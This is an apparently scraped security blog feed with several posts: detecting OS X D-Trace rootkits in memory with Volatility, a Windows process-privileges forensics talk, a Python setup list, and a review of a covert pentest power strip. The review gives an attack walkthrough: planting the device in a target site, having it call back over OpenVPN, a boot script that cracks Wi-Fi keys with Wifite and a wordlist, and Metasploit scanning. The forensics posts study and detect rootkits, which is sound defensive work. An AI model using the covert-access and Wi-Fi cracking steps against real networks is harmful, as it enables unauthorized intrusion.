<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzrosTo9zXp8AjrNtpFIyzZ4WNnARxoan_8yCZSK4m36efuYYlumk_GdWtQSjuq0OHyyKJQOZhzGPwRGqEdbiiN4MHCQLPCDnp8c3ps_MTW995IDL2zy2oJUM_ThZ1Q5OPd4QKskaIKKz/s1600/Screen+Shot+2013-05-13+at+5.19.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzrosTo9zXp8AjrNtpFIyzZ4WNnARxoan_8yCZSK4m36efuYYlumk_GdWtQSjuq0OHyyKJQOZhzGPwRGqEdbiiN4MHCQLPCDnp8c3ps_MTW995IDL2zy2oJUM_ThZ1Q5OPd4QKskaIKKz/s1600/Screen+Shot+2013-05-13+at+5.19.51+PM.png" width="400" /></a></div>
<br />
The fbt probe on the other hand is not that obvious. The Volatility syscall plugin will not show any D-Trace or 'hooked' entries while the following D-Trace command is running:<br />
<br />
<pre>$ sudo dtrace -n 'fbt:mach_kernel:getdirentries64:entry{printf("%x",arg0);}'
</pre>
<br />
To detect the fbt probe, fG! provided a few good pointers in his <a href="http://reverse.put.as/wp-content/uploads/2013/05/SysScan-13-Presentation.pdf" target="_blank">latest presentation</a> about OS X rootkits. Using Volatility's mac_volshell plugin we can monitor the changes:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYinAD2KOtoKj9GJ00fBeIf4nHGbo3biX5oBC1SbIEyZiGgMcz48BxzDNW_v6Wl7Q3PkjnNHQReb-bB6gAZ60nSb5MZr8OsH0EvcDWluK7mJ7GEYYZK0ziuejCMSQfgYBca8ZKC19TLRym/s1600/Screen+Shot+2013-05-13+at+1.48.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYinAD2KOtoKj9GJ00fBeIf4nHGbo3biX5oBC1SbIEyZiGgMcz48BxzDNW_v6Wl7Q3PkjnNHQReb-bB6gAZ60nSb5MZr8OsH0EvcDWluK7mJ7GEYYZK0ziuejCMSQfgYBca8ZKC19TLRym/s1600/Screen+Shot+2013-05-13+at+1.48.15+PM.png" width="400" /></a></div>
<br />
The screenshot above shows the side by side comparison of before and during running the fbt probe. As suggested by fG!, the disassembly of the function shows that it has been patched. The check_dtrace plugin checks for the presence of this patch to detect the fbt probe.<br />
<h2>
A Plugin Arises</h2>
</div>
To save us the trouble of running three separate plugins and other commands, I've built the 'check_dtrace' plugin to detect syscall, mach_trap, and fbt probes to incorporate the discussed analysis. The plugin can be found at <a href="http://github.com/siliconblade/volatility/blob/master/mac/check_dtrace.py" target="_blank">github</a>.<br />
<br />
Below is a sample output of the plugin:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVhqytHwGwaA1k8HZou-qrW8rkYSfLYCeAW2zzRWlFwyi9G5pDav7ZziH4Epg6fbDSfe3BxEXwKW_9Fr0-W8iOkWxTI5E4AWWaZdyFxdVZjovy_r4ahpPOmsodOZE4K8HGIZBVWdqmRitN/s1600/Screen+Shot+2013-05-13+at+2.20.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVhqytHwGwaA1k8HZou-qrW8rkYSfLYCeAW2zzRWlFwyi9G5pDav7ZziH4Epg6fbDSfe3BxEXwKW_9Fr0-W8iOkWxTI5E4AWWaZdyFxdVZjovy_r4ahpPOmsodOZE4K8HGIZBVWdqmRitN/s1600/Screen+Shot+2013-05-13+at+2.20.07+PM.png" width="400" /></a></div>
<br />
The plugin was able to detect all three probes running concurrently at the target host.<br />
<h2>
Conclusion</h2>
<div>
Thanks to fG!, Nemo and the Volatility Framework, I did have a good time with OS X internals! While the check_dtrace plugin is not that complex, it's able to detect otherwise not so obvious D-Trace rootkit techniques. And again we have seen that it's tough to hide in memory. </div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-3985047663487010332013-04-23T20:03:00.000-07:002013-05-29T20:45:11.681-07:00Hunting D-Trace Rootkits with The Volatility Framework<h2>
Summary</h2>
<div>
I recently attended <a href="http://www.infiltratecon.com/" target="_blank">InfiltrateCon 2013</a> and got to see the latest and greatest offensive security issues. There was a <a href="http://felinemenace.org/~nemo/dtrace-infiltrate.pdf" target="_blank">presentation</a> by <a href="http://2013.infosecsouthwest.com/speakers.html#neil_archibald" target="_blank">Nemo</a> titled 'Destructive D-Trace - With Great Power Comes Great Responsibility' that caught my attention. In his talk Nemo showed examples on how to use D-Trace on OS X to hide an attacker's presence and claimed that forensics techniques would have a hard time detecting these. That claim made me think about the <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23" target="_blank">Volatility Framework</a>'s latest support for Mac OS X memory analysis and its capability to detect the presence of D-Trace cloaking.</div>
<h2>
<a name='more'></a></h2>
<h2>
Destructive D-Trace and Rootkits</h2>
<div>
D-Trace is generally considered a dynamic tracing framework that is used for troubleshooting system issues in real time. While the idea of using D-Trace to perform reverse engineering and detect rootkits has been around for a while [<a href="http://blackhat.com/presentations/bh-usa-08/Beauchamp_Weston/BH_US_08_Beauchamp-Weston_DTrace.pdf" target="_blank">pdf</a>], it has not been used as a rootkit development platform to my knowledge. In his presentation, Nemo presented techniques to hide files from ls/lsof/finder, hide processes from the Activity Monitor/ps/top, capture private keys from ssh sessions, and inject javascript to HTML pages as they are rendered by Apache. To realize these techniques he utilized D-Trace's '<a href="http://docs.oracle.com/cd/E18752_01/html/819-5488/gcfbn.html#gcfrv" target="_blank">destructive actions</a>', such as copyout. </div>
<h2>
The Volatility Framework on OS X</h2>
<div>
The Volatility Framework included OS X support in its main body of code back in <a href="https://code.google.com/p/volatility/source/list?path=/trunk/volatility/plugins/mac/__init__.py&start=2698" target="_blank">October 2012</a>. Since then there has been a steady flow of <a href="https://code.google.com/p/volatility/source/browse/trunk/volatility/plugins/mac/" target="_blank">plugins</a> for the OS X platform. Using the Volatility Framework's plugins you can get a list of running or dead processes, get mounted devices, detect rootkits and more. A typical command to get a list of processes looks like:</div>
<div>
<br /></div>
<div>
<pre>$ python vol.py mac_pslist -f ~/memory_samples/ram_dump.mach-o --profile=MacLion_10_7_4_AMDx64
</pre>
</div>
<h3>
Memory Profiles</h3>
<div>
One of following can be used as a --profile option depending on the analyzed system:</div>
<div>
<br /></div>
<div>
<table>
<tbody>
<tr>
<td><b>MacLeopard_10_5_3_Intel
MacLeopard_10_5_4_Intelx86
MacLeopard_10_5_5_Intelx86
MacLeopard_10_5_6_Intelx86
MacLeopard_10_5_7_Intelx86
MacLeopard_10_5_8_Intelx86
MacLeopard_10_5_Intelx86
</b>MacLion_10_7_1_AMDx64
MacLion_10_7_1_Intelx86
MacLion_10_7_2_AMDx64
MacLion_10_7_2_Intelx86
MacLion_10_7_3_AMDx64
MacLion_10_7_3_Intelx86
MacLion_10_7_4_AMDx64
MacLion_10_7_4_Intelx86
MacLion_10_7_5_AMDx64
MacLion_10_7_5_Intelx86
MacLion_10_7_AMDx64
MacLion_10_7_Intelx86
</td>
<td><b>MacMountainLion_10_8_1_AMDx64
MacMountainLion_10_8_2_AMDx64
MacMountainLion_10_8_3_AMDx64</b>
MacSnowLeopard_10_6_1_AMDx64
MacSnowLeopard_10_6_1_Intelx86
MacSnowLeopard_10_6_2_AMDx64
MacSnowLeopard_10_6_2_Intelx86
MacSnowLeopard_10_6_4_AMDx64
MacSnowLeopard_10_6_4_Intelx86
MacSnowLeopard_10_6_5_AMDx64
MacSnowLeopard_10_6_5_Intelx86
MacSnowLeopard_10_6_6_AMDx64
MacSnowLeopard_10_6_6_Intelx86
MacSnowLeopard_10_6_7_AMDx64
MacSnowLeopard_10_6_7_Intelx86
MacSnowLeopard_10_6_8_AMDx64
MacSnowLeopard_10_6_8_Intelx86
MacSnowLeopard_10_6_AMDx64
</td>
</tr>
</tbody></table>
</div>
<br />
If you are not sure what profile to use, you can save the above table's content in a file (e.g. macprofiles.txt) and brute force with the following command till you get a <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_tasks" target="_blank">valid output</a>:<br />
<br />
<pre>awk '{print("python vol.py mac_tasks -f ram_dump.mach-o --profile="$0);system("python vol.py mac_tasks -f ram_dump.mach-o --profile="$0)}' macprofiles.txt</pre>
<h3>
OS X Plugins for Detecting Rootkits</h3>
<div>
<table>
<tbody>
<tr>
<td><b>mac_check_syscalls
</b></td>
<td> Checks to see if system call table entries are hooked
</td>
</tr>
<tr>
<td><b>mac_check_sysctl
</b></td>
<td> Checks for unknown sysctl handlers
</td>
</tr>
<tr>
<td><b>mac_check_trap_table
</b></td>
<td> Checks to see if system call table entries are hooked
</td>
</tr>
<tr>
<td><b>mac_trustedbsd
</b></td>
<td> Lists malicious TrustedBSD policies
</td>
</tr>
<tr>
<td><b>mac_notifiers
</b></td>
<td> Detects rootkits that add hooks into I/O Kit (e.g. LogKext)
</td>
</tr>
<tr>
<td><b>mac_ip_filters
</b></td>
<td> Reports any hooked IP filters
</td>
</tr>
</tbody>
</table>
</div>
<h2>
Simple D-Trace Rootkit</h2>
<div>
I'll only be showing one example that's based on Nemo's presentation since he mentioned that he had a book coming out this summer that talks about OS X Rootkits and I don't want to ruin the fun for him. The example I'll show is a simple D-Trace rootkit that can hide a folder from the command <a href="http://linux.die.net/man/1/ls" target="_blank">ls</a>. It uses syscall probes to hook the <a href="http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/vfs/vfs_syscalls.c" target="_blank">getdirentries64</a> function and rewrites the function's return values to hide the target folder. You can find the script at <a href="https://github.com/siliconblade/dtrace/blob/master/dirhide.d" target="_blank">github.com/siliconblade/dtrace</a>. To run the script in destructive mode you'll have to use the following command:<br />
<br />
<pre>sudo dtrace -w -s dirhide.d</pre>
</div>
<br />
Once running, the script will hide the third entry in the /private/tmp folder.<br />
<br />
Before running the script (ls -la /private/tmp, we will be hiding the third entry, .badness):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnZbxBCeq6uSB81E3ixM3sZwql2N9kN6RoO1tnV2kRLbXLZtoBKB7rGHByO9MI7ac21oAw-oS7nBbN1_BF-Nnxz1HArvFkO1VVDEL3zgODcwvTCXTNFi6XBJ-N1tshpTb_0q-BF7m_7oA/s1600/Screen+Shot+2013-04-23+at+6.27.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnZbxBCeq6uSB81E3ixM3sZwql2N9kN6RoO1tnV2kRLbXLZtoBKB7rGHByO9MI7ac21oAw-oS7nBbN1_BF-Nnxz1HArvFkO1VVDEL3zgODcwvTCXTNFi6XBJ-N1tshpTb_0q-BF7m_7oA/s400/Screen+Shot+2013-04-23+at+6.27.06+PM.png" width="400" /></a></div>
<br />
Running the script:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEidguwZkfRoEsQKdisTIS3i4WHvSl6SodyNlg4o7u2D7LRwJ4YeGdo1_wmeeASESdmbChf0MJAu5OdpX4oDtfxeYLcEjrkyAc4yBQpN5caKRUxoSk6BQT6xoy3vx76Qb0uJrETgb-uEzD/s1600/Screen+Shot+2013-04-23+at+2.45.33+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEidguwZkfRoEsQKdisTIS3i4WHvSl6SodyNlg4o7u2D7LRwJ4YeGdo1_wmeeASESdmbChf0MJAu5OdpX4oDtfxeYLcEjrkyAc4yBQpN5caKRUxoSk6BQT6xoy3vx76Qb0uJrETgb-uEzD/s400/Screen+Shot+2013-04-23+at+2.45.33+PM.png" width="400" /></a></div>
<br />
During script execution .badness is no longer visible (ls -la /private/tmp):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPYIYMnji5lLJjUa1ca341Smueci0W0kiMGnYbAuSkUOxUCNTMStD1WDb4UZLpqFDWeUJoiMcerL0dzFTwg-VdBMVnyDYYPd_Vn-xrjUixm7g-4itPLr0CivcPlx6-XTtfS2SVy-p2doc/s1600/Screen+Shot+2013-04-23+at+6.32.29+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPYIYMnji5lLJjUa1ca341Smueci0W0kiMGnYbAuSkUOxUCNTMStD1WDb4UZLpqFDWeUJoiMcerL0dzFTwg-VdBMVnyDYYPd_Vn-xrjUixm7g-4itPLr0CivcPlx6-XTtfS2SVy-p2doc/s400/Screen+Shot+2013-04-23+at+6.32.29+PM.png" width="400" /></a></div>
<br />
<h2>
Collecting Memory Samples</h2>
<div>
To detect the changes introduced by D-Trace, you'll need to collect memory samples before and during running the script. This can be achieved by using the <a href="http://cybermarshal.com/index.php/cyber-marshal-utilities/mac-memory-reader" target="_blank">Mac Memory Reader</a>. As suggested at the tool's web site you can use the following command to save the memory sample on a FAT formatted drive:<br />
<br />
<pre>sudo ./MacMemoryReader - | split -b 2048m - ram_dump.mach-o.
</pre>
</div>
<h2>
Analysis of the Samples</h2>
<div>
Since we know that the D-Trace script used syscall probes to hook the getdirentries64 function, we will use the Volatility Framework's mac_check_syscalls plugin to check for the hooks' presence. Using the plugin mac_check_syscalls on the memory sample with the hooked function will not yield an entry with the 'HOOKED' label as intended by the plugin. This is due to the fact that the plugin checks to see if a syscall's address is within the known symbol addresses and a D-Trace syscall is in the list of known addresses. For that reason we captured before and after samples to monitor the changes in the system. The following commands were executed on the before and after samples:</div>
<div>
<br /></div>
<div>
<pre>$ python vol.py mac_check_syscalls -f ~/memory_samples/ram_dump-before.mach-o --profile=MacLion_10_7_4_AMDx64 > before_syscalls.txt
</pre>
<pre></pre>
<pre></pre>
<pre>$ python vol.py mac_check_syscalls -f ~/memory_samples/ram_dump-after.mach-o --profile=MacLion_10_7_4_AMDx64 > after_syscalls.txt</pre>
</div>
<br />
To view the difference between the two output files:<br />
<br />
<pre>$ diff before_syscalls.txt after_syscalls.txt</pre>
<pre>< SyscallTable 344 0xffffff8000306b20 _getdirentries64
---
> SyscallTable 344 0xffffff80005c89e0 _dtrace_systrace_syscall
</pre>
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;">The diff output shows that the getdirentries64 syscall entry in row #344, was replaced with a D-Trace syscall. </span><br />
<h2>
Conclusion</h2>
The D-Trace rootkit's activities are visible and detectable after all! Instead of collecting before and after samples, we could have spotted the D-Trace syscall in the hooked sample, which would have warranted further digging. Nemo's presentation has shown again that known tools can be used for subverting a system and won't be easy to spot by a novice investigator, but then again nothing can hide in memory ;) [The follow up to this post where I talk about detecting more D-Trace providers with a Volatility plugin is <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">here</a>.]siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-72592619257986547162013-02-08T04:43:00.001-08:002013-02-14T15:52:47.629-08:00The Analysis of Process Token PrivilegesMy presentation at the 2012 Open Source Memory Forensics Workshop:<br />
<h2>
Summary</h2>
<br />
Reverse engineering windows systems nowadays involves looking at static data, such as executables, symbols, pdbs, and/or dynamic data when debugging with a tool like windbg. Determining data structures and the meaning of their content has proven to be time consuming, especially when dealing with undocumented objects. This presentation tackles the problem by describing a novel approach, which utilizes the Volatility Framework and F-response to monitor changes taking place on a live system’s RAM that appear as a result of manipulating the targeted structures’ content. The technique is used in the discovery of the process privileges on Windows operating systems and the development of a new plugin. The presentation also provides examples of how the new plugin is used to discover malicious activity.<br />
<div>
<br />
The <a href="https://code.google.com/p/volatility/source/browse/trunk/volatility/plugins/privileges.py" target="_blank">privileges plugin</a> can be found in the latest version of the Volatility Framework.</div>
<br />
<div style="color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<br /></div>
<iframe frameborder="0" height="480" src="http://docs.google.com/gview?
a=v&pid=explorer&chrome=false&api=true&embedded=true&srcid=
0B6sJr6AdVULGYjZCMUJfcDdqYUk&hl=en" width="100%"></iframe>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-23457300685152573452013-02-07T19:02:00.000-08:002013-02-08T12:25:44.273-08:00Sneaking into networks with the Demyo Power Strip<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjufRI9pLRnZu8OxQHlOHNtM5RIksZkM6EDr4sdWUGc1kiGiUknM7uWh8UnqmOWS3njR-DZmpaLSCeIiy2K6iHqDUwawfKf63S3x0lDdN3Ecx0LG2jkBhk2WzCpZgR7LPDzDgL6H1EuJs1u/s1600/Screen+Shot+2013-02-05+at+9.30.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjufRI9pLRnZu8OxQHlOHNtM5RIksZkM6EDr4sdWUGc1kiGiUknM7uWh8UnqmOWS3njR-DZmpaLSCeIiy2K6iHqDUwawfKf63S3x0lDdN3Ecx0LG2jkBhk2WzCpZgR7LPDzDgL6H1EuJs1u/s320/Screen+Shot+2013-02-05+at+9.30.09+PM.png" height="248" width="320" /></a></div>
<h2>
<span style="font-family: inherit;"><br /></span></h2>
<h2>
<span style="font-family: inherit;">Summary</span></h2>
<span style="font-family: inherit;"></span><br />
<div>
<span style="font-family: inherit;">Let's see if this silicon blade is sharp enough to cut through the security cheese! </span><br />
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Some intros: The Demyo Power Strip (DPS) is</span> a covert penetration testing device built by Demyo Sec made to be used for penetration tests.<span style="font-family: inherit;"> While not being the first of its kind out there, is a strong competitor to other existing tools, such as </span><a href="http://pwnieexpress.com/products/power-pwn" style="font-family: inherit;" target="_blank">Power Pwn</a><span style="font-family: inherit;">, and <a href="http://theplugbot.com/" target="_blank">the PlugBot</a> etc. The DPS gives you the ability to launch attacks over ethernet, WiFi and Bluetooth.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit;">Features</span></h3>
</div>
<div>
<ul>
<li>Based on Raspberry Pi</li>
<li>CPU 700Mhz, boostable to 1Ghz, 512MB RAM, 32GB SD</li>
<li>Ethernet (10/100), WiFi b/g/n and Bluetooth connectivity</li>
<li>Runs Debian Linux</li>
<li>CLI (via SSH) and GUI (via VNC)</li>
<li>Physical dimensions 14″ x 2.25″ x 8.25″ or 35.56cm x 5.72cm x 20.96cm </li>
<li>Actually functions as a real power strip</li>
</ul>
<div>
<a name='more'></a><br /></div>
</div>
<span style="font-family: inherit;">
</span>
<br />
<h2>
<span style="font-family: inherit;">
<span style="font-family: inherit;">Default Installed Tools</span></span></h2>
<span style="font-family: inherit;">
Some of the relevant packages installed:</span><br />
<div>
<ul>
<li><span style="font-family: inherit;">Nmap</span></li>
<li><span style="font-family: inherit;">OpenVPN</span></li>
<li><span style="font-family: inherit;">w3af</span></li>
<li><span style="font-family: inherit;">aircrack-ng</span></li>
<li><span style="font-family: inherit;">btscanner</span></li>
<li><span style="font-family: inherit;">ophcrack</span></li>
<li><span style="font-family: inherit;">John the Ripper password cracker</span></li>
<li><span style="font-family: inherit;">and many more...</span></li>
</ul>
<h2>
Getting Ready</h2>
</div>
<h3>
Connecting for the First Time</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0QllRYgpSkavLM9TpH8E6sUrc7vf8LnlqVAGJP96v6-GwD_0pHTf6Uu2j7JHQGQt-YR2QABAR1he7e6oaM3k545xOn2j9YEA9Ha5rEaFVUGL0UjioFszDKKYFpG3SBEXMIdRhFmQLtfRk/s1600/dps-eth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0QllRYgpSkavLM9TpH8E6sUrc7vf8LnlqVAGJP96v6-GwD_0pHTf6Uu2j7JHQGQt-YR2QABAR1he7e6oaM3k545xOn2j9YEA9Ha5rEaFVUGL0UjioFszDKKYFpG3SBEXMIdRhFmQLtfRk/s1600/dps-eth.png" height="228" width="320" /></a></div>
<div>
<br /></div>
To setup the DPS, we'll need to hook it up to our network using an ethernet cable. The DPS will pickup an IP address via DHCP and start to listen for SSH connections.<br />
<br />
<h3>
Installing Your Preferred Tools</h3>
<div>
Installing your preferred toolset can be easy as 1-2-3 thanks to the Debian flavor of Linux running on the DPS. Just run apt-get install for your favorite tool.</div>
<div>
<br /></div>
<h3>
Installing the Metasploit Framework</h3>
<div>
To setup Metasploit you should run the following commands:<br />
<br /></div>
<div>
<div style="text-align: left;">
</div>
<ol>
<li>wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2</li>
<li>tar -xvvf framework-latest.tar.bz2</li>
<li>apt-get update</li>
<li>apt-get dist-upgrade (can take a bit)</li>
<li>apt-get install postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 postgresql-doc-9.1 postgresql-server-dev-9.1</li>
<li>gem install pg</li>
</ol>
</div>
<h3>
Setting up a OpenVPN Server</h3>
<div>
For the DPS to connect back, I chose the OpenVPN route. You can easily setup a OpenVPN server on Amazon EC2 as described <a href="http://holgr.com/blog/2009/06/setting-up-openvpn-on-amazons-ec2/" target="_blank">here</a> (I used Ubuntu as a server).<br />
<br />
The server setup:<br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 138px;">
<!--StartFragment-->
<colgroup><col style="mso-width-alt: 5888; mso-width-source: userset; width: 138pt;" width="138"></col>
</colgroup><tbody>
<tr height="15" style="height: 15.0pt;">
<td class="xl63" height="15" style="height: 15.0pt; width: 138pt;" width="138">port
1194</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">proto tcp-server</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">dev tun1</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">ifconfig 10.4.0.1 10.4.0.2</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">status server-tcp.log</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">verb 3</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl64" height="15" style="height: 15.0pt;">secret ovpn.key</td>
</tr>
<tr height="15" style="height: 15.0pt;">
<td class="xl65" height="15" style="height: 15.0pt;">daemon</td>
</tr>
<!--EndFragment-->
</tbody></table>
<br />
<h3>
Setting up OpenVPN on the DPS </h3>
</div>
<div>
Now that we have a server to connect back to, let's setup the DPS to auto connect to this server.<br />
<br />
The DPS OpenVPN client configuration:<br />
<br />
dev tun<br />
proto tcp-client<br />
remote <INSERT IP OR HOSTNAME><br />
port 1194<br />
ifconfig 10.4.0.2 10.4.0.1<br />
redirect-gateway def1<br />
keepalive 10 60<br />
secret ovpn.key<br />
verb 3<br />
mute 10<br />
<br />
To setup auto connect on boot simply run "service openvpn start" after adding the key and configuration files.</div>
<h2>
Sneaking In</h2>
<div>
Now all you need to do is walk into the location of interest, plugin the DPS and wait for it to connect back to your OpenVPN server. For the DPS to connect back you, will either need to connect a network cable or let it find an available WiFi access point (AP). If there are no open WiFi APs, we can setup the DPS to brute force the PSK via aircrack-ng. You'll have to take a lengthy break for this scenario cause it may be a while for the cracking to succeed.<br />
<br />
<h3>
w00t w00t! Seeing the DPS Connect</h3>
You can run netstat to find an established connection or look at /var/log/syslog to track the OpenVPN logs. Due to our simple OpenVPN setup, the DPS will be at 10.4.0.2. Now we can SSH into it and go to town!<br />
<br />
<h3>
Automating WEP/WPA/WPS cracking with <a href="http://code.google.com/p/wifite/" target="_blank">Wifite</a> and <a href="http://code.google.com/p/reaver-wps/" target="_blank">Reaver</a></h3>
<div>
Installing the tools:</div>
<div>
<br />
<ol>
<li>wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py && chmod +x wifite.py</li>
<li>wget http://static.hackersgarage.com/darkc0de.lst.gz && gunzip darkc0de.lst.gz</li>
<li>sudo apt-get install sqlite3 libsqlite3-dev gcc-4.7</li>
<li>svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only</li>
<li>cd reaver-wps-read-only && ./configure && make && make install</li>
</ol>
<div>
Wifite comes with Reaver/WPS integration so all you have to do is run Wifite as:</div>
<div>
<ul>
<li>./wifite.py -all</li>
</ul>
<div>
This will make Wifite perform all three types of attacks (WEP/WPA/WPS).</div>
</div>
<div>
<br /></div>
<div>
You can also configure Wifite to start on boot as a service by doing the following:</div>
<div>
<ol>
<li>nano /etc/init.d/wcracker</li>
<li>Add the following code:</li>
<pre>### BEGIN INIT INFO
# Provides: Wcracker Service
# Required-Start: $local_fs $network $remote_fs $syslog
# Required-Stop: $local_fs $network $remote_fs $syslog
# Default-Start:
# Default-Stop:
# X-Interactive: true
# Short-Description: Start/stop Wcracker Service
### END INIT INFO
export USER='root'
eval cd ~$USER
case "$1" in
start)
# Start the wifi cracker
su $USER -c '/root/wifite.py -all -dict /root/darkc0de.lst'
echo "Starting wireless cracking for $USER "
;;
stop)
# if it's stop, then just kill the process
pkill wifite.py
echo "wireless cracking stopped"
;;
*)
echo "Usage: /etc/init.d/wcracker {start|stop}"
exit 1
;;
esac
exit 0
</pre>
<li>update-rc.d wcracker defaults</li>
<li>And reboot</li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;">Wifite saves the cracked passwords in the file cracked.txt. </span>You can further automate the process by building a script that checks the cracked.txt file and logs into the cracked network for a connect back, but this is a bit out of scope at the moment (maybe on a separate post).</div>
</div>
<br />
<h3>
Some Snooping Around with Metasploit</h3>
<div>
Create a database (e.g. msf) in your Postgres installation then launch Metasploit to connect and populate the database and module cache.</div>
<div>
cd msf3</div>
<div>
./msfconsole</div>
<div>
<div>
msf > db_connect postgres:password@localhost/msf<br />
<br />
You can scan the environment for potential targets using modules, such as auxiliary/scanner/smb/smb_version or build a database of targets with nmap and launch attacks.<br />
<br />
msf > db_nmap -v -sV 192.168.1.0/24<br />
<br />
The command above builds a database of the scanned network that can be used later on.<br />
<br />
To get more in depth information about how to use Metasploit you can visit the Offensive Security <a href="http://www.offensive-security.com/metasploit-unleashed/Introduction" target="_blank">web site</a>. </div>
<div>
<br /></div>
</div>
<h2>
Conclusion</h2>
<div>
Overall, the DPS appears to be a decent covert platform to perform penetration testing. It doesn't physically appear suspicious as other similar devices, especially with an ethernet cable sticking out. The OS is flexible enough to rapidly install or compile non-default tools. It would be great if it had a 3G modem and I heard from Demyo Sec that it will be present in the next release.<br />
<br />
Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!<br />
<br />
You can get more information from Demyo Sec's <a href="http://www.demyo.com/products/demyo-power-strip/" target="_blank">web site</a>.<br />
<br /></div>
<h4>
Disclaimer</h4>
</div>
<div>
The material and actions described here are for educational purposes only. </div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-43179465746742566272012-11-06T12:11:00.000-08:002012-11-06T12:11:05.160-08:00Setting up for Data Analysis with Python<h3>
<span style="font-family: Arial, Helvetica, sans-serif;">How to install numpy, scipy, pandas, matplotlib, IPython on OS X Mountain Lion:</span></h3>
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">install Xcode and associated Command Line Tools from <a href="http://developer.apple.com/">http://developer.apple.com</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">easy_install pip</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install numpy</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install gfortran binaries from <a href="http://r.research.att.com/tools/">http://r.research.att.com/tools/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install scipy</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install pandas</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install freetype from <a href="http://sourceforge.net/projects/freetype/files/">http://sourceforge.net/projects/freetype/files/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">run ln -s /usr/local/include/freetype2/freetype/ /usr/include/freetype</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install libpng from <a href="http://sourceforge.net/projects/libpng/files/">http://sourceforge.net/projects/libpng/files/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install matplotlib</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install IPython</span></li>
</ol>
<br />siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0